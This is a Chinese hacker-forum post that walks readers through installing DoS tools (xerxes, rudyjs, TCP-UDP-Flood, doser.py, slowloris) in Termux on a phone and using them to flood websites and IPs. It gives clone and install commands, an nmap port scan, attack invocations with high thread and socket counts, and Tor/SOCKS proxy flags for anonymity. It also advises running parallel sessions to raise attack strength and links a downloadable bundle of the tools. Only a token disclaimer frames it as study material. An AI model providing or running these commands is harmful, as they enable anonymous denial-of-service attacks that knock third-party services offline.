termuxDDoS攻击网站和IP

 
489 4
爱国者黑客 2023-2-22 14:51:04 来自手机 | 显示全部楼层 |阅读模式
警告:本教程及恢复包仅做学习研究使用,切勿用于非法用途,不要攻击正规网站哦,一切后果自负



打开 Termux 按顺序输入以下内容:



pkg update && pkg upgrade -y



pkg install git nmap clang python nodejs -y



git clone https://github.com/baraalmasri/xerxes



cd ~/xerxes



gcc xerxes.c -o xerxes



cd ~



git clone https://github.com/sahilchaddha/rudyjs.git



npm install -g rudyjs



git clone https://github.com/Leeon123/TCP-UDP-Flood.git



git clone https://github.com/Quitten/doser.py



pip install requests



git clone https://github.com/gkbrk/slowloris.git



nmap 域名或IP地址



#如



nmap www.xxxxx.com



#或者



nmap 10.0.0.2



#回车扫描指定网站主机端口,输出结果如下:



PORT STATE SERVICE

53/tcp closed domain

80/tcp open http

443/tcp open https

8000/tcp filtered http-alt



#根据扫描结果

Http网站端口号:80,8000

Https网站端口号:443





1.xerxes



cd ~/xerxes



./xerxes 域名或IP地址 端口号



#如



./xerxes www.xxxxx.com 443



#或者



./xerxes 10.0.0.2 443



#回车开始对指定网站主机端口发起 DoS 攻击





2.rudyjs



#解释:

rudy

-t 攻击目标网址

-l 有效负载的大小 (单位 Bytes) 默认 1048576 Bytes (1 Mb)

-n 最大连接数

-m HTTP 请求方式,默认 POST

-d 发送的每个字节之间的延迟 (单位 秒)

-v 启用详细日志

-p 使用 Tor 代理匿名攻击

-u Tor 代理服务器IP地址

-o Tor 代理服务器端口



#如



rudy -t https://www.xxxxx.com:8000 -d 5 -n 500 -m GET



rudy -t https://www.xxxxx.com:8000 -d 5 -n 500 -m POST



#或者



rudy -t https://10.0.0.2:8000 -d 5 -n 500 -m GET



rudy -t https://10.0.0.2:8000 -d 5 -n 500 -m POST



#回车开始对指定网站主机端口发起 DoS 攻击





3.TCP-UDP-Flood



cd ~/TCP-UDP-Flood



#解释:

域名/IP地址:10.0.0.2

端口号:80

UDP 数据包(是/否):否

每个连接发送的数据包数:50

线程数:10



#如



Host/Ip:www.xxxxx.com



#或者



Host/Ip:10.0.0.2

Port:80

UDP(y/n):n

Packets per one connection:50

Threads:10



#回车开始对指定网站主机端口发起 DoS 攻击





4.doser.py



cd ~/doser.py



#解释:

python doser.py

-g 指定GET请求。 用法:-g 网址

-p 指定POST请求。 用法:-p 网址

-d 为 POST 请求指定数据有效负载

-ah 指定附加的标头 (header)

-t 指定要使用的线程数



#如



python doser.py -t 999 -g https://www.xxxxx.com:8000



python doser.py -t 999 -p https://www.xxxxx.com:8000



#或者



python doser.py -t 999 -p https://10.0.0.2:8000



python doser.py -t 999 -g https://10.0.0.2:8000



#回车开始对指定网站主机端口发起 DoS 攻击





5.slowloris



cd ~/slowloris



#解释:

python slowloris.py 域名或IP地址

-p 端口号

-s 需要使用的套接字总数

-v 增加日志记录

-ua 对每个请求使用随机化用户代理 UA 标识

-x 使用 SOCKS5 代理进行连接

--proxy-host 代理服务器IP地址

--proxy-port 代理服务器端口

--https 对请求使用 HTTPS

--sleeptime 发送的每个标头之间的睡眠时间



#如



python slowloris.py www.xxxxx.com -p 80 -ua -s 9999 --sleeptime 5



python slowloris.py www.xxxxx.com -p 443 -ua -s 9999 --sleeptime 5 --https



#或者



python slowloris.py 10.0.0.2 -p 80 -ua -s 9999 --sleeptime 5



python slowloris.py 10.0.0.2 -p 443 -ua -s 9999 --sleeptime 5 --https



#回车开始对指定网站主机端口发起 DoS 攻击

















下面是本人恢复包的使用说明:



网盘链接:

https://cloud.189.cn/t/36Fj6r3YbMfu





1.安装 ZeroTermux,并手动开启储存权限



2.下载 DoS_tools 恢复包 (.gz文件),将恢复包文件移动至 手机储存/xinhao/data/ 目录下



3.打开 ZeroTermux,进入终端



4.右划打开菜单,选第三个备份/恢复



5.点恢复,找到 DoS_tools 恢复包 (.gz文件),确定恢复



6.如果显示“没有系统目录,请建立”,然后自动生成一条命令,请按回车键



7.重复4,5步,输入自定义容器名称,开始恢复 (此过程不得切屏,请保持软件前台)



8.恢复完成,重进,右划菜单找到切换系统,切换到自定义名称容器,再次重进。



9.进入终端输入:



nmap www.xxxxx.com



#扫描指定网站端口



ls



#输出:

TCP-UDP-Flood doser.py rudyjs slowloris storage xerxes



cd 复制需要使用的 DoS 工具文件夹名



#如



cd xerxes



./xerxes www.xxxxx.com 80



#回车开始攻击指定网站



#可以左滑调出菜单,建立多个新会话同时攻击,加大攻击力度



#按 CTRL + C 停止攻击



#输入 cd 返回主目录

xerxes扫描攻击演示
xerxes正在攻击
建立多个新会话同时攻击
rudyjs使用说明
rudyjs攻击演示
rudyjs正在攻击
TCP-UDP-Flood攻击演示
TCP-UDP-Flood正在攻击
doser.py 攻击演示 (POST)
doser.py 攻击演示 (GET)
slowloris攻击演示
爱国者黑客 2023-2-22 14:54:41 来自手机 | 显示全部楼层
需要在手机下载terumx程序再输入这些代码,如果有报错的可以找我
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2025 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行